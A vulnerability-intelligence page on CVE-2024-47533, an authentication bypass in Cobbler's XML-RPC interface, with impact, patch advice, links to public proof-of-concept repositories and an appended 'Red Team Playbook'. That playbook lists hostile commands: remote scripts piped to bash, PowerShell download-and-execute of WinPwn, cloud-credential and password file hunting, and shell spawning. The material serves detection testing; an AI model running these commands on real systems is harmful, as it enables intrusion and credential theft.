CVE-2024-47533
Overview
This vulnerability is an authentication bypass in the Cobbler Linux installation server. The root cause is that the function utils.get_shared_secret() erroneously returns a fixed value '-1', bypassing proper authentication checks. The affected component is the XML-RPC interface of Cobbler versions starting from 3.0.0 up to, but not including, 3.2.3 and 3.3.7.
Vulnerability Description
Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
Impact
An attacker with network access can bypass authentication entirely and gain unrestricted administrative control over the Cobbler server via the XML-RPC interface. No prior authentication or user interaction is required, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N. This enables unauthorized modification of installation configurations, potentially leading to system compromise, data exposure, or disruption of deployment services.
Solution
Upgrade Cobbler to version 3.2.3 or 3.3.7 or later, where the authentication bypass is corrected. Detailed patch information and commit references are available in the GitHub security advisory GHSA-m26c-fcgh-cp6h and related commits 32c5cada013dc8daa7320a8eda9932c2814742b0 and e19717623c10b29e7466ed4ab23515a94beb2dda. No alternative workarounds are documented; applying the vendor-provided patches is required.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The improper authentication vulnerability in Cobbler, a tool designed for rapid setup of network installation environments, presents a critical security concern for organizations relying on this software for Linux installations. This vulnerability arises from the `utils.get_shared_secret()` function, which fails to implement proper authentication checks, consistently returning `-1`. As a result, any user can connect to the Cobbler XML-RPC interface using the empty username and the password `-1`, effectively bypassing any authentication mechanisms. This flaw is particularly concerning as it grants unauthorized users full control over the Cobbler server, allowing them to manipulate configurations, manage installation profiles, and potentially compromise the integrity of the entire network installation process.
The attack vectors associated with this vulnerability are straightforward yet highly effective. An attacker with network access to the Cobbler server can exploit this flaw without needing any specialized knowledge or advanced skills. By simply sending requests to the XML-RPC interface with the default credentials, the attacker can execute arbitrary commands, modify server settings, and even deploy malicious configurations across the network. Scenarios of exploitation could include an insider threat, where a disgruntled employee takes advantage of this vulnerability, or an external attacker who gains access to the network. The ease of exploitation raises significant concerns, as it allows for rapid and widespread compromise of systems relying on Cobbler for installation and configuration.
The real-world impact of this vulnerability can be severe, particularly for organizations that utilize Cobbler in their IT infrastructure. Given the critical role that Cobbler plays in automating the deployment of operating systems, a successful attack could lead to unauthorized access to sensitive data, disruption of services, and potential data breaches. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, especially if the organization is subject to compliance requirements that mandate strong security practices. Furthermore, the ability to manipulate installation processes could enable attackers to deploy backdoored systems, creating long-term vulnerabilities that could be exploited in future attacks.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched versions of Cobbler (3.2.3 and 3.3.7) that address the authentication issue. Regularly updating software is a fundamental practice in cybersecurity, as it ensures that known vulnerabilities are remediated. Additionally, implementing network segmentation can help limit access to the Cobbler server, reducing the attack surface. Organizations should also consider employing intrusion detection systems (IDS) to monitor for unusual activity on the Cobbler server, such as unauthorized access attempts or unexpected configuration changes. Regular security audits and vulnerability assessments can further enhance the organization's security posture by identifying and addressing potential weaknesses before they can be exploited.
In summary, the improper authentication vulnerability in Cobbler poses a significant threat to organizations that utilize this tool for network installations. The ease of exploitation, coupled with the potential for severe real-world impacts, underscores the importance of prompt remediation and proactive security measures. By staying vigilant and adopting best practices in software management and network security, organizations can mitigate the risks associated with this vulnerability and protect their critical IT infrastructure from unauthorized access and manipulation.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
dollarboysushil/CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC
CVE-2024-47533 is a critical authentication bypass vulnerability in Cobbler (versions 3.0.0 to before 3.2.3 and 3.3.7) a...
|
dollarboysushil | 8 | 1 | 2025-08-12 | View |
|
baph00met/CVE-2024-47533
CVE-2024-47533: Cobbler Authentication Bypass & Code Execution
|
baph00met | 3 | 1 | 2025-08-11 | View |
|
okkotsu1/CVE-2024-47533
|
okkotsu1 | 1 | 0 | 2025-08-14 | View |
|
00xCanelo/CVE-2024-47533-PoC
|
00xCanelo | 1 | 0 | 2025-08-12 | View |
|
zs1n/CVE-2024-47533
PoC of CVE-2025-47533 Clobber RCE
|
zs1n | 1 | 0 | 2025-08-13 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-47533 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda |